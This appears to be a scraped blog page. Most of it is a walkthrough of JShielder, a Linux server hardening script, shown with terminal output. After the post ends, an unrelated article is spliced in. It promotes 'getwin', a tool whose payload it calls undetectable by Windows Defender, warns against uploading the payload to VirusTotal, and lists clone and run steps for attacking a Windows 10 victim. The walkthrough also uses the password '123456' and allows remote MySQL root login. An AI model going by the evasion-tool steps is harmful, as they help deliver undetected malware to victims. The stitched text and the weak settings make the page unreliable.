   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip phpmyadmin

• Now type git clone https://github.com/Jsitech/JShielder.git

root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/Jsitech/JShielder.git
 Cloning into 'JShielder'…
 remote: Enumerating objects: 70, done.
 remote: Counting objects: 100% (70/70), done.
 remote: Compressing objects: 100% (44/44), done.
 remote: Total 1192 (delta 48), reused 46 (delta 26), pack-reused 1122
 Receiving objects: 100% (1192/1192), 1.09 MiB | 764.00 KiB/s, done.
 Resolving deltas: 100% (624/624), done.

• Then type cd JShielder && ls JShielder is developed in bash script.

root@ubuntu:/home/iicybersecurity# cd Downloads/JShielder/
root@ubuntu:/home/iicybersecurity/Downloads/JShielder# ls
 'CentOS_7(Under Development)'   jshielder.sh   LICENSE   README.md   UbuntuServer_16.04LTS   UbuntuServer_18.04LTS

• Type ./jshielder.sh

root@myserver1:/home/iicybersecurity/Downloads/JShielder# ./jshielder.sh

     ██╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗ ███████╗██████╗
     ██║██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗██╔════╝██╔══██╗
     ██║███████╗███████║██║█████╗  ██║     ██║  ██║█████╗  ██████╔╝
██   ██║╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║██╔══╝  ██╔══██╗
╚█████╔╝███████║██║  ██║██║███████╗███████╗██████╔╝███████╗██║  ██║
╚════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ ╚══════╝╚═╝  ╚═╝

Automated Hardening Script for Linux Servers
Developed By Jason Soto @JsiTech
---------------------------------------------------------------------------------------------------------
[+] SELECT YOUR LINUX DISTRIBUTION
---------------------------------------------------------------------------------------------------------

1. Ubuntu Server 16.04 LTS
2. Ubuntu Server 18.04 LTS
3. Linux CentOS 7 (Coming Soon)
4. Debian GNU/Linux 8 (Coming Soon)
5. Debian GNU/Linux 9 (Coming Soon)
6. Red Hat Linux 7 (Coming Soon)
7. Exit

2

• Type 2

[+] SELECT THE DESIRED OPTION
1. LAMP Deployment
2. LEMP Deployment
3. Reverse Proxy Deployment With Apache
4. Running With SecureWPDeployer or JSDeployer Script
5. Customized Run (Only run desired Options)
6. CIS Benchmark Hardening
Exit
 
1

• Type 1

[+] Setting some Prerequisites
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]'universe' distribution component is already enabled for all sources.
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will display that universal distributed component is enabled. Press enter to configure further.
• Enter Y & type mysql1
• And then enter www.testsite1.com

¿Do you Wish to Set a HostName? (y/n): y
Type a Name to Identify this server :
  (For Example: myserver): mysql1
¿Type Domain Name?:www.testsite1.com

Creating legal Banners for unauthorized access
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then configure timezone.

[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'

• Then select country.

[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'
 Local time is now:      Wed Jul 17 22:31:34 PDT 2019.
 Universal Time is now:  Thu Jul 18 05:31:34 UTC 2019.
 Done.

  To EXIT Press x Key, Press ENTER to Continue

• Then server will run an update. This command will search for available updates for the system. & will install required updates.
• It might take time depending on your internet speed.

[+] Updating the System
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 387 packages can be upgraded. Run 'apt list --upgradable' to see them.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 Calculating upgrade… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   gstreamer1.0-gtk3 libllvm8 linux-headers-4.18.0-25 linux-headers-4.18.0-25-generic linux-image-4.18.0-25-generic
   linux-modules-4.18.0-25-generic linux-modules-extra-4.18.0-25-generic python3-dateutil
 The following packages will be upgraded:

apport apport-gtk apt apt-utils aptdaemon aptdaemon-data bash bind9-host binutils binutils-common
   binutils-x86-64-linux-gnu busybox-initramfs busybox-static bzip2 console-setup console-setup-linux cpp cups

Done.
  To EXIT Press x Key, Press ENTER to Continue

• After installing updates press enter.

 [+] Setting UMASK to a more Restrictive Value (027)
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Now JShielder will enhance security by blocking or disabling unnecessary components of system.

 [+] Disabling Unused FileSystems
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Now JShielder will block uncommon network ports to restrict scanning from external sources used in ethical hacking phases of pentesting.

[+] Disabling Uncommon Network Protocols
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Create new user. Enter username & password
• Enter username testuser1 & password 123456
• Enter y

[+] We will now Create a New User
Type the new username: testuser1
 Adding user testuser1' ... Adding new grouptestuser1' (1001) …
 Adding new user testuser1' (1001) with grouptestuser1' …
 Creating home directory /home/testuser1' ... Copying files from/etc/skel' …
Enter new UNIX password:
Retype new UNIX password:
 passwd: password updated successfully
 Changing the user information for testuser1
 Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:     
        Work Phone []:     
        Home Phone   []:     
        Other []:
 Is the information correct? [Y/n] y

Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Instructions to Generate an RSA KEY PAIR
 *** IF YOU DONT HAVE A PUBLIC RSA KEY, GENERATE ONE ***
      Follow the Instruction and Hit Enter When Done
      To receive a new Instruction
 RUN THE FOLLOWING COMMANDS  a) ssh-keygen -t rsa -b 4096

• Copy & paste above command in the same terminal & hit enter.

 ssh-keygen -t rsa -b 4096 

 b) cat /home/testuser1/.ssh/id_rsa.pub >> /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue

Run the Following Command to copy the Key
  Press ENTER when done
  ssh-copy-id -i /root/.ssh/id_rsa.pub testuser1@192.168.1.11
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Securing SSH
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 chattr: No such file or directory while trying to stat /home/testuser1/.ssh/authorized_keys
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• From SSH will be secured. Then it will install Fail2ban which works as intrusion prevention system. It main motive to protect from brute force attacks.

[+] Setting IPTABLE RULES
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Done.
  To EXIT Press x Key, Press ENTER to Continue

[+] Installing Fail2Ban
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 Suggested packages:
   sendmail-doc rmail logcheck resolvconf sasl2-bin
 The following NEW packages will be installed:
   liblockfile-bin liblockfile1 lockfile-progs procmail sendmail sendmail-base sendmail-bin sendmail-cf sensible-mda
 0 upgraded, 9 newly installed, 0 to remove and 1 not upgraded.
 374 not fully installed or removed.
 Need to get 899 kB of archives.
 After this operation, 4,449 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

• Then it will remove python-pyinotifiy enter Y to remove python dependency.

Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   python3-pyinotify whois
 Suggested packages:
   mailx monit sqlite3 python-pyinotify-doc
 The following NEW packages will be installed:
   fail2ban python3-pyinotify whois
 0 upgraded, 3 newly installed, 0 to remove and 1 not upgraded.
 Need to get 398 kB of archives.
 After this operation, 2,110 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 fail2ban all 0.10.2-2 [329 kB]

Created symlink /etc/systemd/system/multi-user.target.wants/fail2ban.service → /lib/systemd/system/fail2ban.service.
 Processing triggers for ureadahead (0.100.0-21) …
 Setting up whois (5.3.0) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up python3-pyinotify (0.9.6-1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install mysql

[+] Installing, Configuring and Optimizing MySQL
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 mysql-server is already the newest version (5.7.26-0ubuntu0.18.04.1).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
 Securing the MySQL server deployment.

 Connecting to MySQL using a blank password.\

 VALIDATE PASSWORD PLUGIN can be used to test passwords
 and improve security. It checks the strength of password
 and allows the users to set only those passwords which are
 secure enough. Would you like to setup VALIDATE PASSWORD plugin?

 Press y|Y for Yes, any other key for No:y

• Choose the password policy. Enter 1

There are three levels of password validation policy:
 LOW    Length >= 8
 MEDIUM Length >= 8, numeric, mixed case, and special characters
 STRONG Length >= 8, numeric, mixed case, special characters and dictionary                  file
 Please enter 0 = LOW, 1 = MEDIUM and 2 = STRONG: 1

New password:

Re-enter new password:

Estimated strength of the password: 100
 Do you wish to continue with the password provided?(Press y|Y for Yes, any other key for No) :y

• Enter y & remove the anonymous user for enhancing security of the mysql. This will restrict anonymous login into mysql. As per Digital forensics expert of iicybersecurity, some DB Admin leave anonymous login, which further helps in attacks.

 By default, a MySQL installation has an anonymous user,
 allowing anyone to log into MySQL without having to have
 a user account created for them. This is intended only for
 testing, and to make the installation go a bit smoother.
 You should remove them before moving into a production
 environment.
 Remove anonymous users? (Press y|Y for Yes, any other key for No) :y

• This depends totally on requirement whether to give remote root access or not. So we will enter n

 Normally, root should only be allowed to connect from
 'localhost'. This ensures that someone cannot guess at
 the root password from the network.
 Disallow root login remotely? (Press y|Y for Yes, any other key for No): n 

• Remove the test user which comes by default in mysql. Enter y

By default, MySQL comes with a database named 'test' that
 anyone can access. This is also intended only for testing,
 and should be removed before moving into a production
 environment.
 Remove test database and access to it? (Press y|Y for Yes, any other key for No) : y

 Dropping test database…
 Success.

 Removing privileges on test database…
 Success. 

 Reloading the privilege tables will ensure that all changes
 made so far will take effect immediately.
 Reload privilege tables now? (Press y|Y for Yes, any other key for No) :y

Success.
 All done!
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will apache web server.

[+] Installing Apache Web Server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 apache2 is already the newest version (2.4.29-1ubuntu4.7).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install PHP required files.

[+] Installing, Configuring and Optimizing PHP
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 php is already the newest version (1:7.2+60ubuntu1).
 php-pear is already the newest version (1:1.10.5+submodules+notgz-1ubuntu1.18.04.1).
 php-pear set to manually installed.
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   php-cli
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 3,160 B of archives.
 After this operation, 12.3 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 php-cli all 1:7.2+60ubuntu1 [3,160 B]
 Fetched 3,160 B in 1s (2,978 B/s)

Preparing to unpack …/python-mysqldb_1.3.10-1build1_amd64.deb …
 Unpacking python-mysqldb (1.3.10-1build1) …
 Setting up python-mysqldb (1.3.10-1build1) …
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install modsecurity.

[+] Installing ModSecurity
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 libxml2 is already the newest version (2.9.4+dfsg1-6.1ubuntu1.2).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libxml2-dev libxml2-utils
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 793 kB of archives.
 After this operation, 3,731 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Preparing to unpack …/modsecurity-crs_3.0.2-1_all.deb …
 Unpacking modsecurity-crs (3.0.2-1) …
 Setting up modsecurity-crs (3.0.2-1) …
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Setting up liblua5.1-0:amd64 (5.1.5-8.1build2) …
 Setting up libapache2-mod-security2 (2.9.2-1) …
 apache2_invoke: Enable module security2
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• After then run the following command to restart apache2.

[+] Setting UP OWASP Rules for ModSecurity
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]OK
 Enabling module headers.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Optimizing Apache
 -- Enabling ModRewrite
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]Enabling module rewrite.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Enter email id to receive alerts.

[+] Installing ModEvasive
 Type Email to Receive Alerts testemail.com
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   bsd-mailx
 The following NEW packages will be installed:
   bsd-mailx libapache2-mod-evasive
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 80.5 kB of archives.
 After this operation, 256 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 bsd-mailx amd64 8.1.2-0.20160123cvs-4 [66.0 kB]
 Get:2 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-evasive amd64 1.10.1-3 [1

Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libapache2-mod-evasive (1.10.1-3) …
 apache2_invoke: Enable module evasive
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install Mod_Qos

[+] Installing Mod_Qos/Spamhaus
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libapache2-mod-qos
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 202 kB of archives.
 After this operation, 744 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-qos amd64 11.44-1build1 [202 kB]
 Fetched 202 kB in 3s (80.2 kB/s)
 Selecting previously unselected package libapache2-mod-qos

Building dependency tree
 Reading state information… Done
 E: Unable to locate package libapache2-mod-spamhaus
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will configure Fail2ban

[+] Configuring Fail2Ban
 Configuring Fail2Ban……
 [ ok ++++++++++++++++++++++++++++++++++++++++++++++++++   ][….] Restarting fail2ban (via systemctl): fail2ban.service.
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install additional packages.

[+] Installing Additional Packages
 Install tree………….
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   tree
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 40.7 kB of archives.
 After this operation, 105 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tree amd64 1.7.0-5 [40.7 kB]
 Fetched 40.7 kB in 2s (24.3 kB/s)
 Selecting previously unselected package tree.
 (Reading database … 228842 files and directories currently installed.)
 Preparing to unpack …/tree_1.7.0-5_amd64.deb …
 Unpacking tree (1.7.0-5) …
 Setting up tree (1.7.0-5) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Setting up apt-show-versions (0.22.7ubuntu1) …
 ** initializing cache. This may take a while **
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Install PHPUnit……….
 config-set succeeded
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will install ipv6 dependencies & will install server additional hardening & press y or n for enabling or disabling USB support.

[+] Running additional Hardening Steps
 Running Additional Hardening Steps….
 Reading package lists… Done++++++++++++++++++++++++++   ]
 Building dependency tree
 Reading state information… Done
 Package 'at' is not installed, so not removed
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7

Preparing to unpack …/libpam-cracklib_1.1.8-3.6ubuntu2.18.04.1_amd64.deb …
 Unpacking libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Securing Cron
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
Do you want to Disable USB Support for this Server? (y/n): n
OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install Unhide for displaying hidden processes which are running in the background.

[+] Installing UnHide
 Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   rkhunter
 The following NEW packages will be installed:
   unhide
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 46.6 kB of archives.
 After this operation, 136 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 unhide amd64 20130526-1 [46.6 kB]
 Fetched 46.6 kB in 2s (25.9 kB/s)
 Selecting previously unselected package unhide.
 (Reading database … 228917 files and directories currently installed.)
 Preparing to unpack …/unhide_20130526-1_amd64.deb …
 Unpacking unhide (20130526-1) …
 Setting up unhide (20130526-1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install Tiger dependency.

[+] Installing Tiger
 Tiger is a security tool that can be use both as a security audit and intrusion detection system
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   chkrootkit john john-data tripwire
 The following NEW packages will be installed:
   chkrootkit john john-data tiger tripwire
 0 upgraded, 5 newly installed, 0 to remove and 1 not upgraded.
 Need to get 6,868 kB of archives.
 After this operation, 24.0 MB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tripwire amd64 2.4.3.1-2 [1,647 kB]

Setting up john-data (1.8.0-2build1) …
 Setting up john (1.8.0-2build1) …
 For More info about the Tool use the ManPages
  man tiger
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install rootkit hunter.

[+] Installing RootKit Hunter
 Rootkit Hunter is a scanning tool to ensure you are you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
 - MD5 hash compare      
 - Look for default files used by rootkits      
 - Wrong file permissions for binaries      
 - Look for suspected strings in LKM and KLD modules      
 - Look for hidden files      
 - Optional scan within plaintext and binary files 

File updated: searched for 181 files, found 152
 ***To Run RootKit Hunter ***
      rkhunter -c --enable all --disable none
      Detailed report on /var/log/rkhunter.log
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will tune bashrc.

[+] Tunning bashrc, nano and Vim
 Tunning .bashrc……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Tunning Vim……
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Tunning Nano……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then JShielder will update create cron job.

[+] Adding Daily System Update Cron Job
 Creating Daily Cron Job
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Most of configuration of JShielder will be automate. So now it will install artillery.

[+] Cloning Repo and Installing Artillery
 fatal: destination path 'artillery' already exists and is not an empty directory.
 Welcome to the Artillery installer. Artillery is a honeypot, file monitoring, and overall security tool used to protect your nix systems.
 Written by: Dave Kennedy (ReL1K)

 Do you want to install Artillery and have it automatically run when you restart [y/n]: y

[] Adding artillery into startup through init scripts.. [] Triggering update-rc.d on artillery to automatic start…
 [*] Checking out Artillery through github to /var/artillery
 Cloning into '/var/artillery'…
 remote: Enumerating objects: 35, done.
 remote: Counting objects: 100% (35/35), done.
 remote: Compressing objects: 100% (35/35), done.
 remote: Total 1632 (delta 17), reused 3 (delta 0), pack-reused 1597

Setting Iptable rules for artillery
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Artillery configuration file is /var/artillery/config
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Install PSAD

[+] Install PSAD
 PSAD is a piece of Software that actively monitors you Firewall Logs to Determine if a scan
        or attack event is in Progress. It can alert and Take action to deter the Threat
    NOTE:    IF YOU ARE ONLY RUNNING THIS FUNCTION, YOU MUST ENABLE 

 LOGGING FOR iptables   
 iptables -A INPUT -j LOG   \
 iptables -A FORWARD -j LOG

 Do you want to install PSAD (Recommended)? (y/n): y

To EXIT Press x Key, Press ENTER to Continue

• Then disable compilers.

[+] Disabling Compilers
 Disabling Compilers…..
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
  If you wish to use them, just change the Permissions
  Example: chmod 755 /usr/bin/gcc 
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Now secure the tmp folder. Enter y

[+] Securing /tmp Folder
 ¿Did you Create a Separate /tmp partition during the Initial Installation? (y/n): y

Nice Going, Remember to set proper permissions in /etc/fstab
 Example:
 /dev/sda4   /tmp   tmpfs  loop,nosuid,noexec,rw  0 0 
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• JShielder will restrict access to apache config files.

[+] Restricting Access to Apache Config Files
 Restricting Access to Apache Config Files……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++    ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will restrict unattended security updates. Press y

[+] Enable Unattended Security Updates
 ¿Do you Wish to Enable Unattended Security Updates? (y/n): y

• It will install accounting dependency.

0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 87.2 kB of archives.
 After this operation, 304 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 acct amd64 6.6.4-1 [87.2 kB]
 Fetched 87.2 kB in 2s (48.7 kB/s)                      
 Selecting previously unselected package acct.
 (Reading database … 229408 files and directories currently installed.)
 Preparing to unpack …/acct_6.6.4-1_amd64.deb …
 Unpacking acct (6.6.4-1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Processing triggers for install-info (6.5.0.dfsg.1-2) …
 Setting up acct (6.6.4-1) …
 update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
 update-rc.d: warning: stop runlevel arguments (1) do not match acct Default-Stop values (0 1 6)
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 OK

• Install autitd enter y

[+] Installing auditd
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   libauparse0
 Suggested packages:
   audispd-plugins

After this operation, 803 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Enabling auditing for processes that start prior to auditd
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]Sourcing file `/etc/default/grub'
 Generating grub configuration file …
 Found linux image: /boot/vmlinuz-4.18.0-25-generic
 Found initrd image: /boot/initrd.img-4.18.0-25-generic
 Found linux image: /boot/vmlinuz-4.18.0-15-generic
 Found initrd image: /boot/initrd.img-4.18.0-15-generic
 Found memtest86+ image: /boot/memtest86+.elf
 Found memtest86+ image: /boot/memtest86+.bin
 done
 Configuring Auditd Rules
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

Done.
  To EXIT Press x Key, Press ENTER to Continue

• JShielder will install & enable sys stat.

[+] Installing and enabling sysstat
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   isag
 The following NEW packages will be installed:
   sysstat
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 295 kB of archives.
 After this operation, 1,192 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 sysstat amd64 11.6.1-1 [295 kB]
 Fetched 295 kB in 2s (124 kB/s)    

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue                

• Install arpwatch for monitoring ARP traffic. Enter y

[+] ArpWatch Install
 ArpWatch is a tool for monitoring ARP traffic on System. It generates log of observed pairing of IP and MAC.
 Do you want to Install ArpWatch on this Server? (y/n): y

Synchronizing state of arpwatch.service with SysV service script with /lib/systemd/systemd-sysv-install.
 Executing: /lib/systemd/systemd-sysv-install enable arpwatch

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Set GNU Bootloader password. More information on working of bootloader is part of advance ethical hacking course of International Institute of Cyber Security (IICS, iiCyberSecurity).

[+] GRUB Bootloader Password
 It is recommended to set a password on GRUB bootloader to prevent altering boot configuration (e.g. boot in single user mode without password)
 Do you want to set a GRUB Bootloader Password? (y/n): y

Do you want to set a GRUB Bootloader Password? (y/n): y
 Enter password: 
 Reenter password: 
 PBKDF2 hash of your password is grub.pbkdf2.sha512.10000.15D5D8416652D02126C81FCF8C49A59B82F070F8010A13412C420345E97AA9CADC8798E7218A27105875C0C0950DC6A7EAC1D3DA92C32A6107FF572CB42A1D53.C05B506339CB3227411FF804E9587808E40CD72DD07CD749B004D324E9F90D2A4D092E6C9BE64E6E61DC71FB32A8DB00E65CA7BE6582975E30F64C9D46CD1C19
 Sourcing file `/etc/default/grub'
 Generating grub configuration file …

Found memtest86+ image: /boot/memtest86+.bin
 done
 On every boot enter root user and the password you just set
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Secure boot settings.

Securing Boot Settings
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Setting File Permissions on Critical System Files
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
 Setting Sticky bit on all world-writable directories
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
: Read-only file system
 chmod: changing permissions of '/snap/core/7270/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/7270/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core/6350/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/var/tmp': Read-only file system

  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Above you can see that permission has changed. All changes have been completed. Then it will display message that JShielder has fully configured Ubuntu for creating & deploying web applicaitons.

The post How to Secure any Linux Server | Automated Server Hardening script appeared first on Information Security Newspaper | Hacking News.

Payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do Not Upload the payload generated on virustotal.com.

The tool does not need any configuration, no need to configure port forwarding or install other programs. See the demonstration in below video.

• For testing purposes, On attacker side we will use Kali Linux 2018.4 amd64 and on the Victim side we will use Windows 10 1809.
• Open terminal type git clone https://github.com/thelinuxchoice/getwin.git
• Then type cd getwin & type chmod u+x getwin.sh

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
 Cloning into 'getwin'…
 remote: Enumerating objects: 46, done.
 remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
 Unpacking objects: 100% (46/46), done.
 root@kali:/home/iicybersecurity/Downloads# cd getwin/
 root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
 root@kali:/home/iicybersecurity/Downloads/getwin# ls
 getwin.sh  icon  LICENSE  README.md

• Type ./getwin.sh

